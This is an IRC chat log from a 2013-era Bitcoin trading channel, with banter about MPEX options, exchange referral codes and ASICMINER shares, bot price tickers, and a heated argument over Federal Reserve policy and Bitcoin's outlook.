20:46:11 It was in stock Mar 26 20:47:56 whose bot is it that puts up the options? :D Mar 26 20:48:04 mpoe bot Mar 26 20:48:29 mpoebot and soebot Mar 26 20:48:45 soebot is much smaller than mpoebot Mar 26 20:49:07 Bugpowder_: you got that affiliate link/ invitation code for CoinBr? Mar 26 20:49:37 I want to check it out, and I want you to get paid for all your PR. Mar 26 20:50:47 heh. no other user around? Mar 26 20:50:54 heyyyy Mar 26 20:51:01 let me make an account first :) Mar 26 20:51:07 5 minutes... Mar 26 20:51:16 O_o Mar 26 20:51:28 i think we see fail soon Mar 26 20:51:31 ... and fund it. no refcode access without funding :D Mar 26 20:51:41 yah sure Mar 26 20:51:48 and paying monthly fee Mar 26 20:51:49 ? Mar 26 20:52:03 or maybe i can give you special evangelist account? Mar 26 20:52:58 give him special account Mar 26 20:53:14 special account that charges more fees :) Mar 26 20:53:44 jurov, how many users you have on coinbr nowadays? Mar 26 20:53:44 but can't he earn more than 1BTC/year, srsly? Mar 26 20:54:04 heh Mar 26 20:54:05 i probably can't, Bugpowder_ can. Mar 26 20:54:12 what does the T and N mean at the end of the option names? Mar 26 20:54:19 depends on my pr skillz Mar 26 20:54:19 THIS month NEXT month Mar 26 20:54:24 T expire this month , N next Mar 26 20:54:36 ok, but you can exercise them anytime right Mar 26 20:54:50 yes Mar 26 20:54:57 at 24hprc Mar 26 20:54:57 yes. just usually its' better to sell to mpoebot than exercise Mar 26 20:55:06 k Mar 26 20:55:15 I think always better to sell to bot Mar 26 20:55:20 yea 24h price seems to make it hard to use for short term speculation Mar 26 20:55:23 but sometimes bot is down Mar 26 20:55:59 how come bot is taking the hit Mar 26 20:56:42 http://bitbet.us/bet/39/network-difficulty-under-6-million/ paid ... and i made over 6btc \o/ Mar 26 20:57:00 i should use that site more Mar 26 20:57:02 !!!! awesome Mar 26 21:00:28 smickles what? u wanna beer? Mar 26 21:01:04 I'll take a beer :D Mar 26 21:01:31 manhattan por moi Mar 26 21:01:40 Stone IPA plz Mar 26 21:01:53 ;;gpg info smickles Mar 26 21:01:53 mcallens 12 pls Mar 26 21:01:53 User 'smickles', with keyid EA62D7CEB2450C3F, fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6, registered on Mon Jun 20 12:24:35 2011. http://bitcoin-otc.com/viewgpg.php?nick=smickles . Currently not authenticated. Mar 26 21:02:07 Anyone interested in a Vegas meetup at some point? Mar 26 21:02:21 I am if I can get away for a weekend Mar 26 21:02:29 vegas is 8hrs away in a car Mar 26 21:03:03 I was thinking of getting a suite at the Aria with some friends that I got into bitcoin Mar 26 21:03:07 anyone else wants a beer? Mar 26 21:03:10 after cashing out a bit. Mar 26 21:03:23 i'm also 3000 miles away Mar 26 21:03:49 send beer here : 15P1P2XXtB3ANXzKM9a3WsAYwWBQMQS8S8 Mar 26 21:04:38 sweet, thanks jurov :D Mar 26 21:04:48 send single malt here: 1GdtkZzhZTzBssUq6bnE27cz4rv5SJ4sr5 Mar 26 21:04:53 :D Mar 26 21:05:07 makers here: 1PKN13yoE1djfh7c4frx5kjiUhTRABkCxZ Mar 26 21:05:32 Bugpowder__: got that evangelist account link yet? Mar 26 21:05:43 1CbcoatRNRj3tGY9G6nXqf143o8Vzd4rmA cheers Mar 26 21:05:48 he did not ask. but got a beer instead Mar 26 21:06:26 I'm getting drunk off this 6pack Mar 26 21:06:33 tonight Mar 26 21:06:45 cheers! round closed. Mar 26 21:06:48 I sent funds... waiting for it Mar 26 21:07:21 Bugpowder__: np, thanks! just msg me when you get it, i'l use it when I get home. Mar 26 21:07:30 jurov, thanks! Mar 26 21:07:42 ty Mar 26 21:08:20 basically the bet was a hedge to back iDiff-O offering Mar 26 21:08:54 but things went lucky so that diff law low when iDiff expired and jumped up before the bet resolved Mar 26 21:09:04 so, free money :) Mar 26 21:09:46 heheh Mar 26 21:12:45 btw, your depiosit was credited Mar 26 21:13:13 [HAVELOCK] [VTX] 1 @ 0.7381 BTC [-] Mar 26 21:13:15 was it credited with the beer money? :) Mar 26 21:13:37 jurov: how do I find the referral code Mar 26 21:13:40 I love your BETA mermaid! Mar 26 21:13:47 click on Profile Mar 26 21:13:49 kewl, you can order anything on coiner! Mar 26 21:14:09 i had a beta fish Mar 26 21:14:14 never turned humanish Mar 26 21:14:20 mp should prolly replace NAT.ROUTERS with S.BEER Mar 26 21:14:25 deadweasel: Invite code is t1vLT2E7SK Mar 26 21:14:35 anyone else feel free to use it! Mar 26 21:14:44 so I can get rich Mar 26 21:14:52 off the labors of others. Mar 26 21:15:16 u filthy rentier Mar 26 21:15:48 [BTCTC] [BASIC-MINING] 1 @ 0.34999 BTC [+] Mar 26 21:16:17 Noice.... 2 factor auth Mar 26 21:16:26 via google or wallet Mar 26 21:16:32 5 starts Mar 26 21:16:35 stars Mar 26 21:17:43 Bugpowder__: thanks! Mar 26 21:18:33 [BTCTC] [ASICMINER-PT] 1 @ 0.74998 BTC [-] Mar 26 21:19:09 deadweasel, the plan is for mermaid to stay: http://bitcoin-assets.com/static/coinbr-248x50.png Mar 26 21:19:54 jurov: just funded my account. nice I like the logo! Mar 26 21:20:01 i like the mermaid Mar 26 21:20:45 but it's also warning, don't heed the calls of the sirens :) Mar 26 21:21:42 yes Mar 26 21:21:48 strap me to the mast with rope, plug your ears with seaweed, and ROW ON! Mar 26 21:21:56 i had all my friends stuff wax in their ears, but i just tied myself to the mast Mar 26 21:22:06 wax Mar 26 21:22:13 you beat me Mar 26 21:22:21 high five for odyssey references Mar 26 21:22:33 o/ Mar 26 21:26:11 [MPEX] [S.MPOE] 7431 @ 0.00063815 = 4.7421 BTC [-] Mar 26 21:26:11 To all passthrough operators: Have your largest gains come from IPO offerings? Mar 26 21:38:51 [MPEX] [S.MPOE] 6419 @ 0.00063815 = 4.0963 BTC [-] Mar 26 21:38:51 [MPEX] [S.MPOE] 15184 @ 0.00064816 = 9.8417 BTC [+] Mar 26 21:45:12 MPEX could not be easier to use, once you learn how to use it <<< this. Mar 26 21:47:01 [BTCTC] [PAJKA.BOND] 1 @ 0.10895 BTC [+] Mar 26 21:47:33 [BTCTC] [BTC-BOND] 1 @ 0.009989 BTC [-] Mar 26 21:47:45 [MPEX] [O.BTCUSD.C750T] 1 @ 0.07287477 BTC [+] Mar 26 21:50:58 [MPEX] [O.BTCUSD.C750T] 1 @ 0.07282198 BTC [-] Mar 26 21:52:44 dub... i just know how to enjoy it, not spell it. Mar 26 21:53:39 [BTCTC] [ASICMINER-PT] 27 @ 0.74001 = 19.9803 BTC [-] Mar 26 21:53:42 [BTCTC] [PAJKA.BOND] 1 @ 0.09 BTC [-] Mar 26 21:54:22 nobody taking me up on the asicminer offer Mar 26 21:54:27 i wonder why? Mar 26 21:54:34 what's your offer? Mar 26 21:54:59 also isn't AM rather over-valued now that they are paying themselves? Mar 26 21:55:01 loan me your shares Mar 26 21:55:09 I pay you 1.05x dividends Mar 26 21:55:14 oh, my bad. ain't got none. Mar 26 21:55:16 and give the shares back Mar 26 21:55:22 in a month or two Mar 26 21:55:27 but I did use your affiliate link. Mar 26 21:55:30 tx Mar 26 21:57:35 deadweasel: yeah pretty good stuff, I've got one of the oaked expression s Mar 26 21:58:15 is that the 10 year fine oak? Mar 26 21:58:36 what is the asicminer offer Mar 26 21:58:43 i had that last, good stuff. but then I had the 12, and remembered why it's more. Mar 26 21:58:46 "WARNING: This OP's account was well known and active on the Something Awful forums, in the anti-bitcoin threads in both GBS and YOSPOS (the username was changed recently). Everything /u/PaidGovernmentShill is saying should be treated with extreme skepticism until ample proof is given." Mar 26 21:58:56 maybe SR is not exposed. Mar 26 21:59:23 jcpham: offer to lend Bugpowder__ your AM shares, he pays you 1.05x divs Mar 26 21:59:27 deadweasel: not sure Mar 26 21:59:34 they grey box? Mar 26 21:59:46 s/they/the Mar 26 22:00:58 lmao Mar 26 22:01:07 don't tell me somethingbawful is stupid enough to imagine Mar 26 22:01:13 "they shall crash bitcoin and save the day" Mar 26 22:01:17 by means of reddit posting Mar 26 22:01:23 [MPEX] [O.BTCUSD.P750T] 8 @ 0.05118997 = 0.4095 BTC [-] Mar 26 22:01:30 time to leave work. adios y'all! keep makin' money! Mar 26 22:01:55 [MPEX] [O.BTCUSD.C750T] 1 @ 0.07284474 BTC [+] Mar 26 22:02:56 deadweasel: I think this one http://www.thewhiskyexchange.com/P-11812.aspx Mar 26 22:06:29 [MPEX] [O.BTCUSD.P750T] 7 @ 0.05055601 = 0.3539 BTC [-] Mar 26 22:10:46 ;;calc 75/1.05055 Mar 26 22:10:47 71.3911760506 Mar 26 22:11:40 [MPEX] [O.BTCUSD.C750T] 1 @ 0.07324674 BTC [+] Mar 26 22:12:55 [MPEX] [O.BTCUSD.P750T] 7 @ 0.05005851 = 0.3504 BTC [-] Mar 26 22:17:19 [BTCTC] [ASICMINER-PT] 1 @ 0.744 BTC [+] Mar 26 22:17:21 [BTCTC] [ASICMINER-PT] 1 @ 0.743 BTC [-] Mar 26 22:17:23 [BTCTC] [ASICMINER-PT] 1 @ 0.742 BTC [-] Mar 26 22:17:25 [BTCTC] [ASICMINER-PT] 1 @ 0.741 BTC [-] Mar 26 22:17:27 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Mar 26 22:17:29 [BTCTC] [ASICMINER-PT] 1 @ 0.73801 BTC [-] Mar 26 22:17:32 [BTCTC] [ASICMINER-PT] 1 @ 0.738 BTC [-] Mar 26 22:17:34 [BTCTC] [ASICMINER-PT] 1 @ 0.7191 BTC [-] Mar 26 22:17:36 [BTCTC] [ASICMINER-PT] 2 @ 0.695 = 1.39 BTC [-] Mar 26 22:17:38 [BTCTC] [ASICMINER-PT] 20 @ 0.6502 = 13.004 BTC [-] Mar 26 22:17:40 [BTCTC] [ASICMINER-PT] 1 @ 0.6501 BTC [-] Mar 26 22:17:43 [BTCTC] [ASICMINER-PT] 3 @ 0.6501 = 1.9503 BTC [-] Mar 26 22:17:45 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 26 22:17:47 [BTCTC] [ASICMINER-PT] 3 @ 0.61002 = 1.8301 BTC [-] Mar 26 22:17:50 [BTCTC] [ASICMINER-PT] 1 @ 0.6 BTC [-] Mar 26 22:17:52 [BTCTC] [ASICMINER-PT] 19 @ 0.6 = 11.4 BTC [-] Mar 26 22:17:54 [BTCTC] [ASICMINER-PT] 1 @ 0.59998 BTC [-] Mar 26 22:21:14 [HAVELOCK] [VTX] 2 @ 0.7056 = 1.4112 BTC [-] Mar 26 22:21:15 [HAVELOCK] [VTX] 3 @ 0.7 = 2.1 BTC [-] Mar 26 22:21:35 WELL THEN Mar 26 22:22:02 so much for borrowing asicminer and selling for .85 Mar 26 22:22:24 yo, anyone want to borrow some asicminer? Mar 26 22:22:51 bugpowder: do you have a link to your asicminer offer? Mar 26 22:24:05 ;;bc,nethash Mar 26 22:24:06 51891.838511036272 Mar 26 22:24:30 [BTCTC] [ASICMINER-PT] 1 @ 0.69999 BTC [+] Mar 26 22:24:56 https://bitcointalk.org/index.php?topic=158780.msg1677534#msg1677534 Mar 26 22:25:13 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 26 22:25:22 borrow some asicminer? Mar 26 22:27:02 Bugpowder__: I've been thinking about replying to your offer Mar 26 22:27:18 I'm thinking about cancelling it Mar 26 22:27:26 act fast! Mar 26 22:27:31 :) Mar 26 22:27:57 i guess there's still some bids on bitfunder, Mar 26 22:28:23 but with all the manual movements, pt creatations, etc. you probably won't be able to do anything too fast Mar 26 22:28:24 i don't know enough about this, im still trying to structure my investment Mar 26 22:28:47 I'd rather just deal with existing PT funds Mar 26 22:29:00 than ASICMINER itself Mar 26 22:29:02 right, i'd have to create them, i got the real things Mar 26 22:29:04 ;;ticker Mar 26 22:29:04 BTCUSD ticker | Best bid: 77.39000, Best ask: 77.44000, Bid-ask spread: 0.05000, Last trade: 77.39000, 24 hour volume: 58618.02997539, 24 hour low: 73.11000, 24 hour high: 79.72001, 24 hour vwap: 76.81664 Mar 26 22:29:37 I leave you guys for a few hours and you can't even get the price to 80? cmon Mar 26 22:29:46 yah I'll do bitfunder still Mar 26 22:29:54 ;;bc,stats Mar 26 22:29:58 Current Blocks: 228159 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1664 blocks | Next Difficulty In About: 1 week, 3 days, 8 hours, 2 minutes, and 58 seconds | Next Difficulty Estimate: 6975914.74409 | Estimated Percent Change: 4.18303 Mar 26 22:30:01 buttfunder is even harder than btct Mar 26 22:30:28 [MPEX] [S.MPOE] 1000 @ 0.00063516 = 0.6352 BTC [-] Mar 26 22:30:30 [MPEX] [S.MPOE] 7200 @ 0.00062873 = 4.5269 BTC [-] Mar 26 22:30:38 Bugpowder__ late :D Mar 26 22:30:49 you need a weex account, tickle ukyo's balls, expose yourself to serial scamee DT Mar 26 22:30:57 blah Mar 26 22:31:26 hmmm they have puts on the price though Mar 26 22:31:27 heheh Mar 26 22:31:32 maybe I'll just do that Mar 26 22:32:03 nah Mar 26 22:32:16 not enough liquidity to make it worth it Mar 26 22:32:16 dub: how is bitfunder hard? Mar 26 22:32:42 and wha serial scams are you refering to ? Mar 26 22:33:11 jokes Mar 26 22:33:13 don't you need an acct on weex to use bf? Mar 26 22:33:34 correct. what about that is "hard"? unless clicking some buttons is "difficult" Mar 26 22:33:54 well its an extra account to have for no appreciable reason Mar 26 22:34:02 there are many reasons Mar 26 22:34:11 ranging from security and so on Mar 26 22:34:18 lol Mar 26 22:34:31 Ukto what's your take on the entire fincen thing btw ? Mar 26 22:34:34 re weex Mar 26 22:34:39 mircea_popescu: its great news. Mar 26 22:34:40 doestne ffect weex Mar 26 22:34:46 weex is not in the us Mar 26 22:34:48 its AU Mar 26 22:34:56 also you have to trust some guy with an anime avatar.. sheesh Mar 26 22:35:12 dub: evil world dominating anime avatar Mar 26 22:35:13 :) Mar 26 22:35:18 mircea_popescu have you said anything about fincen yet? Mar 26 22:35:20 fincen has shown it will not make an enemy of bitcoin and specified how to do it legal Mar 26 22:35:39 Lyspooner yes. i have said "here is fincen saying what I said back in october and all the reddit "lawyers" laughed at" Mar 26 22:37:00 what did you say in october Mar 26 22:37:02 they should bake me pies. Mar 26 22:37:52 http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Mar 26 22:41:17 well, they require licensing if your a us based exchange. Mar 26 22:41:19 thats really about it Mar 26 22:41:44 they tried to touch on directly selling ecurrenc for $$ (local/direct trades) Mar 26 22:41:49 but they cant really enforce it. Mar 26 22:41:58 i think it was put in there to make someone shut up Mar 26 22:42:04 who was bothering them Mar 26 22:42:05 :P Mar 26 22:42:21 fuck that was a boring day Mar 26 22:42:27 its like how copying vhs's was illegal Mar 26 22:42:59 yes, exactly Mar 26 22:45:01 and let's be real here for a half damn second if you want to play in this space in the us it means licensing Mar 26 22:45:30 anyone who says otherwise and tries to operate out of the us will likely get their face stomped in Mar 26 22:45:51 eventually Mar 26 22:45:53 you'll note that most people in the space are operating from *outside* the us Mar 26 22:46:11 there are some idiots here who are doing things to some degree or another Mar 26 22:46:18 but nobody playing in the big bad scawwy assets space Mar 26 22:46:37 herr popescu aside but see above Mar 26 22:50:51 77.5 eaten Mar 26 22:51:35 ;;ticker Mar 26 22:51:35 BTCUSD ticker | Best bid: 77.77125, Best ask: 77.98000, Bid-ask spread: 0.20875, Last trade: 77.98000, 24 hour volume: 60339.76121126, 24 hour low: 73.11000, 24 hour high: 79.72001, 24 hour vwap: 76.84286 Mar 26 22:52:12 <_Cristian> benkay: what's with popescu? Mar 26 22:52:31 _Cristian what about? Mar 26 22:52:53 <_Cristian> you mentioned him earlier and I was curious to find out more Mar 26 22:53:04 you must be blue here Mar 26 22:53:07 http://mpex.co Mar 26 22:53:09 his shop[ Mar 26 22:53:10 Ukto, so if I buy puts on ASICMINER on bitfunder. When I execute the puts, do I get the difference between the last price and the strike price or what? Mar 26 22:53:26 bugpowder it's a 24hr vwap Mar 26 22:53:34 iirc Mar 26 22:53:35 ;;ticker Mar 26 22:53:36 haha 24hr vwap ftw. Mar 26 22:53:38 BTCUSD ticker | Best bid: 78.12474, Best ask: 78.20340, Bid-ask spread: 0.07866, Last trade: 78.12474, 24 hour volume: 60030.23352097, 24 hour low: 73.11000, 24 hour high: 79.72001, 24 hour vwap: 76.85850 Mar 26 22:53:41 <_Cristian> benkay: and is it trustworthy? Mar 26 22:53:42 78.5 Mar 26 22:53:55 _Cristian you have to make that call on your own Mar 26 22:53:59 sup tiberiusiv Mar 26 22:54:35 "A cat can survive fall from height of hundreds of Cheap Ray Bans Glasses feet." Mar 26 22:54:40 today i learned. Mar 26 22:55:51 did you read about the guy running loads of free porn sites to drive up pageviews on his health sites for impressionfraud? Mar 26 22:56:03 itty bitty little iframes all over the porn sites Mar 26 22:56:41 Bugpowder__: sorry in depth programming atm Mar 26 22:56:44 programmed to make 1 visitor to the porn site look like 1 visitor exploring the other sites Mar 26 22:57:11 Bugpowder__: if you execute a put, you get (amount) * (strike price[aka trade price]) Mar 26 22:57:16 or you get amount Mar 26 22:57:20 depending on if its a call or a put Mar 26 22:57:29 Do I need to own shares to buy a put? Mar 26 22:58:07 or to exercise a put? Mar 26 22:58:46 HERE WE GO Mar 26 22:59:36 i got richer while i slept Mar 26 22:59:38 mhm Mar 26 22:59:45 go back to sleep Mar 26 23:00:03 i know, i should be sleeping normally at this hour Mar 26 23:00:04 :/ Mar 26 23:00:31 UPS charged me an exorbitant fee for my headphones, grr Mar 26 23:02:04 How much richer? Mar 26 23:03:45 not much like you guys, only have a few btc Mar 26 23:04:22 Good enough Mar 26 23:05:49 but that $21.00 brokerage stung. wtf Mar 26 23:07:27 [MPEX] [O.BTCUSD.C750T] 2 @ 0.07590368 = 0.1518 BTC [+] Mar 26 23:07:54 whatchoo talkin about bowjob? Mar 26 23:08:00 broker fees on coinbr? Mar 26 23:08:02 [BTCTC] [ASICMINER-PT] 3 @ 0.699 = 2.097 BTC [-] Mar 26 23:08:20 nah, UPS.. I got something shipped Mar 26 23:08:31 If it was USPS there wouldnt be brokerage Mar 26 23:11:09 what do you mean by brokerage? Mar 26 23:11:22 [BTCTC] [ASICMINER-PT] 6 @ 0.7 = 4.2 BTC [+] Mar 26 23:11:25 the shipping cost? Mar 26 23:11:32 he left Mar 26 23:11:42 well. Mar 26 23:11:45 possibly customs brokerage though Mar 26 23:16:16 theres an insidious form of idiot tax I've encountered where customs try to push you through a brokerage to pay sales tax Mar 26 23:19:32 ;;bids 75 Mar 26 23:19:33 There are currently 11005.086 bitcoins demanded at or over 75.0 USD, worth 834370.275355 USD in total. | Data vintage: 15.6584 seconds Mar 26 23:19:38 pressure is building.... Mar 26 23:21:43 yeah Mar 26 23:21:49 lotta pressure... Mar 26 23:23:31 chart? Mar 26 23:24:58 Bugpowder__: you can keep the tesla. http://www.wired.com/autopia/2013/03/mercedes-benz-sls-electric/#slideid-56056 Mar 26 23:25:35 need space for the carseat. Mar 26 23:26:27 as are european ones Mar 26 23:26:34 http://www.reddit.com/r/Bitcoin/comments/1b2diz/bitcoinica_liquidation_it_is_likely_that_any/ Mar 26 23:27:02 us market topped in july Mar 26 23:27:05 '11 Mar 26 23:27:11 btc bubble popped in oct Mar 26 23:27:36 US market has not topped yet Mar 26 23:28:43 not sure that was related to any market Mar 26 23:28:59 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [+] Mar 26 23:29:17 BTC is pretty uncorrleated I would say Mar 26 23:29:28 other than the one that got hacked, had all its coins sold off and destroyed confidence in btc in generall Mar 26 23:30:24 us is irrelevent Mar 26 23:30:37 everyone waits for govt to verify them Mar 26 23:30:45 it's drive by eu atm Mar 26 23:31:45 listen to the orthodoxy Mar 26 23:32:16 so this rally last 2 weeks is caused by usd doing something? Mar 26 23:35:11 there should have been a peak in also 2009 then, no? Mar 26 23:35:34 ..er..2010 i mean Mar 26 23:36:24 [BTCTC] [ASICMINER-PT] 100 @ 0.65 = 65 BTC [-] Mar 26 23:36:27 so you are shorting, right? Mar 26 23:37:01 looks like you are having trouble predicting the past Mar 26 23:38:46 now why do you think that is? Mar 26 23:40:16 so by your terms, bitcoin will stop going up when the fed stops printing money, which will be never Mar 26 23:41:17 both US stocks and BTC will top out roughly the same time Mar 26 23:41:29 and where else will the money go to, then? Mar 26 23:41:30 that is what you said, which is patently wrong Mar 26 23:42:03 the herd will start buying usg bonds? puhleaze Mar 26 23:42:32 800 million market cap for bitcoins, in the world economy is exactly shit Mar 26 23:42:45 .000000001 percent Mar 26 23:42:54 maybe less Mar 26 23:43:15 lol, ok w\e Mar 26 23:43:41 network hash rate is more important and adoption Mar 26 23:44:03 what fundamentals it did have? Mar 26 23:44:05 Friday is coming up- worried about your options? Mar 26 23:44:38 does not matter to me Mar 26 23:45:05 how many of the 60,000 75puts did mircea_popescu buy? Mar 26 23:45:09 certainly did not have an adoption in 2011 Mar 26 23:45:42 dollar liquidity is a oxymoron Mar 26 23:46:04 how can dollar liquidity tighten i current situation, i ask again? Mar 26 23:46:43 and 2012 was adoption by scammers, real business adoption started only in recent months Mar 26 23:46:54 pointless argument, deflactionary currency compared to static supply Mar 26 23:47:08 deflationay Mar 26 23:47:13 nm Mar 26 23:47:25 but how will credit contract? all these bad mortgages will magically get repaid? Mar 26 23:47:48 or bernanke will burn heaps of usd bannotes? Mar 26 23:47:49 add more 0'z to world debt Mar 26 23:47:58 0's Mar 26 23:48:27 [BTCTC] [ASICMINER-PT] 7 @ 0.7 = 4.9 BTC [+] Mar 26 23:48:37 ELI5 what is the credit contraction you're esposuing Mar 26 23:48:54 yeah but tiberiusiv Mar 26 23:49:00 you're forgetting one thing Mar 26 23:49:13 no one cares about the dollar anymore Mar 26 23:49:16 tiberiusiv: WRONG Mar 26 23:49:22 WRONG WRONG WRONG Mar 26 23:49:27 lol, I am out Mar 26 23:49:33 he does NOT report to the treasury Mar 26 23:49:41 the federal reserve is NOT part of the treasury Mar 26 23:50:01 [05:48:50] bernanke can only create dollars as long as the treasury market lets him. Mar 26 23:50:02 this channel is tripping my spam protection bot's flooding threshold :P Mar 26 23:50:03 you said this Mar 26 23:50:05 BOMB market? :P Mar 26 23:50:07 [05:48:50] bernanke can only create dollars as long as the treasury market lets him. Mar 26 23:50:09 "Credit contractions are attempts to minimize or limit the amount of credit that is currently available to consumers." <<< but it's NOT possible anymore Mar 26 23:50:09 thats what you said Mar 26 23:50:46 the federal reserve does not issue bonds, so I dont understand what you're getting at Mar 26 23:50:47 they can't stop , or the bond traders don't get paid $20 mil for the year Mar 26 23:50:56 so, they don't give a shit Mar 26 23:51:07 bernake reports to the 5 largest banks in the world Mar 26 23:51:14 (which also happen to be the 5 largest banks in the US) Mar 26 23:51:37 tiberiusiv: no, if he doesn't do what hes told by the federal reserve board he is fired and replaced Mar 26 23:51:46 the 5 largest banks tell him to keep printing money illegally Mar 26 23:52:01 the federal reserve does not have authorization from the US Federal government to print money Mar 26 23:52:37 i repeat, bernanke can't get away with not extending credit anymore Mar 26 23:52:45 and who exactly rates AAA credit? LOLOLOL Mar 26 23:52:51 fail Mar 26 23:52:55 fail Mar 26 23:53:14 lol Mar 26 23:53:25 the two largest bond rater agencies are afraid of lowering the US credit rating Mar 26 23:53:34 "21.19 Cyprus Finance Minister Michael Sarris has said uninsured Laika depositors could face an 80pc haircut, and might have to wait up to seven years for a payout." Mar 26 23:53:36 they dont want to die Mar 26 23:53:39 worst thing about putting someone on ignore is when no one else does Mar 26 23:53:45 80% HAIRCUT Mar 26 23:53:50 ThickAsThieves: you ignored tiberiusiv? Mar 26 23:54:00 i go back and forth Mar 26 23:54:09 ThickAsThieves: well, I did too Mar 26 23:54:19 when i dont understand whats going on i have to turn him back on Mar 26 23:54:33 tiberiusiv refuses to read the constitution Mar 26 23:54:36 thats not my problem Mar 26 23:54:50 US is not AAA - fail Mar 26 23:54:59 AA outlook negative Mar 26 23:55:03 fail Mar 26 23:55:18 ;;estimate Mar 26 23:55:19 Next difficulty estimate | 6940247.63172 based on data since last change | 7288653.72639 based on data for last three days Mar 26 23:55:23 ;;ticker Mar 26 23:55:23 BTCUSD ticker | Best bid: 78.49000, Best ask: 78.49001, Bid-ask spread: 0.00001, Last trade: 78.49001, 24 hour volume: 61542.22530806, 24 hour low: 73.11000, 24 hour high: 79.72001, 24 hour vwap: 76.94045 Mar 26 23:55:26 the market says Treasuries are safe relative all the other shit out there Mar 26 23:55:33 dollar printing is highest in history Mar 26 23:55:33 not that they are AAA Mar 26 23:55:48 currency of last resort is the dollar Mar 26 23:55:49 Stupid dollar printing.. Mar 26 23:56:04 tiberiusiv: if you can get away with it, why not Mar 26 23:56:04 People getting taxed, really. Mar 26 23:56:15 Who needs taxes when you can print money? Mar 26 23:56:16 Robbed, exactly Mar 26 23:56:24 gov will run up the debt until market forces them not to Mar 26 23:56:41 there is no credible alternative reserve currency Mar 26 23:56:47 yet Mar 26 23:56:53 so your argument for bitcoin is wrong - as you just stated Mar 26 23:57:31 can not rise, because interest rates would go up- then they can't pay the bills- already in a death spiral Mar 26 23:57:41 just really slow Mar 26 23:57:46 really really slow Mar 26 23:58:43 so, peoople are going to sell bitcoins to convert to $ to pay bills? Mar 26 23:58:44 I really think that BTC is not being driven by macro liquidity right now, but speculative fever and capital flight Mar 26 23:59:11 Bugpowder__: I believe it is liquidity Mar 26 23:59:14 it is an implausible reserve currency, that gains a little more traction each day. Mar 26 23:59:28 tiberiusic, so you really think ppl will start selling btc and buying US treasury bonds anytime??? Mar 26 23:59:43 anyway. Nobody cares that cyprus just said 80% haircut over 100k now? Mar 26 23:59:43 you imply they will Mar 26 23:59:49 I am not concerned with price movement now, I got in - if it goes back to 30 or 40 w/e Mar 27 00:00:02 ;;bids 0 Mar 27 00:00:05 There are currently 36649783 bitcoins demanded at or over 0.0 USD, worth 9609689.18993 USD in total. | Data vintage: 0.0173 seconds Mar 27 00:00:11 all time high Mar 27 00:00:14 9.6MM Mar 27 00:00:33 tiberiusiv: that was due to margin calls Mar 27 00:00:35 well, if I need my btcoins next week I will worry about it then Mar 27 00:01:03 asset correlation approaches 1 in periods of crisis Mar 27 00:01:06 yes everyone has poor understanding, except you Mar 27 00:01:20 Jurov, I guess you are a dumbass Mar 27 00:02:10 how many Bitcoins do you have Jurov- seem to doing ok I think Mar 27 00:02:20 well, whole notion that ppl will sell en masse btc to buy us tresury bonds seems utterly ridiculous Mar 27 00:02:35 they will use all fiat and other assets to do so , not btc Mar 27 00:02:41 tiberiusiv: the problem I have is that half of what you are saying makes perfect sense, but the other half is taking things quite a bit past what I consider reasonable Mar 27 00:02:48 oyu think - sp500 and bitcon price are related Mar 27 00:02:50 you Mar 27 00:02:56 bitcoin Mar 27 00:03:16 you can read anything into a chart Mar 27 00:03:20 yes but you reason that the correlation is caused bby credit contractions and us treasury bonds Mar 27 00:03:40 nice, so you've got two data point? Mar 27 00:03:46 congrats Mar 27 00:04:24 BTC is not considered an asset yet Mar 27 00:04:30 by nearly anyone Mar 27 00:04:31 but us Mar 27 00:04:57 Your explaination would make more sense if BTC was already established, had a market cap of >10BB Mar 27 00:05:08 Calls going up in value Mar 27 00:05:16 I think other forces are driving BTCUSD here Mar 27 00:05:32 now these forces may be correlated to a macro sentiment shift Mar 27 00:05:36 World economy over $70 trilliion Mar 27 00:05:45 for example, flight to safety Mar 27 00:05:59 = move to treasurys, move to BTC Mar 27 00:06:00 you are the idiot Mar 27 00:06:14 you shut up with nonsense Mar 27 00:06:19 ugh Mar 27 00:06:31 tiberiusiv: i think we are all adults and know what we are doing Mar 27 00:06:54 lol Mar 27 00:06:59 oh thank god Mar 27 00:07:01 bye fucktard Mar 27 00:07:28 srsly, for someone who hangs out in btc forums...he is constantly going on about how bad of an investment they are Mar 27 00:07:36 oh no, i'm scared of volatility Mar 27 00:07:50 It's almost time for a ponzi chart update. Mar 27 00:08:01 I want my fund value to hit 2BTC/share Mar 27 00:08:08 yes, only if he could be baited to short... but no Mar 27 00:08:12 Fund value? Mar 27 00:08:14 i know! Mar 27 00:08:20 i'm like just go short if you are so bearish Mar 27 00:08:30 the most annoying people in the world don't practice what they preach Mar 27 00:08:34 I express all my investments as shares in a 'fund' Mar 27 00:08:43 with a NAV that stared at 1BTC Mar 27 00:08:47 maybe he should have shorted it with iambakell Mar 27 00:08:52 oh Mar 27 00:09:02 So there's no actual fund =P Mar 27 00:09:04 well Mar 27 00:09:07 he offered smickles a bet that was without escrow two years from now Mar 27 00:09:09 ... Mar 27 00:09:10 I played around with it Mar 27 00:09:23 for 100 btc Mar 27 00:09:29 Managed some coins for friends and family Mar 27 00:09:30 but Mar 27 00:10:02 I don't think I can legally offer investments outside of that group Mar 27 00:11:29 so I shut it down after a few months Mar 27 00:11:38 still keep the records Mar 27 00:12:14 nice Mar 27 00:12:40 its a grey area...investment pools have different regulations from something offered to the public or qualified invvestors Mar 27 00:13:28 anyone know of a fix library for python? Mar 27 00:13:36 fixlib seems to be broken somehow Mar 27 00:17:44 [MPEX] [S.MPOE] 4068 @ 0.00063341 = 2.5767 BTC [+] Mar 27 00:37:05 [MPEX] [S.DICE] 2555 @ 0.00449992 = 11.4973 BTC [-] Mar 27 00:40:01 [MPEX] [S.DICE] 400 @ 0.00449997 = 1.8 BTC [+] Mar 27 00:40:29 [MPEX] [S.DICE] 800 @ 0.00449998 = 3.6 BTC [+] Mar 27 00:44:51 [MPEX] [S.DICE] 2879 @ 0.00449999 = 12.9555 BTC [+] Mar 27 00:47:36 [BTCTC] [B.YABMC] 1 @ 0.01501 BTC [+] Mar 27 00:47:42 [BTCTC] 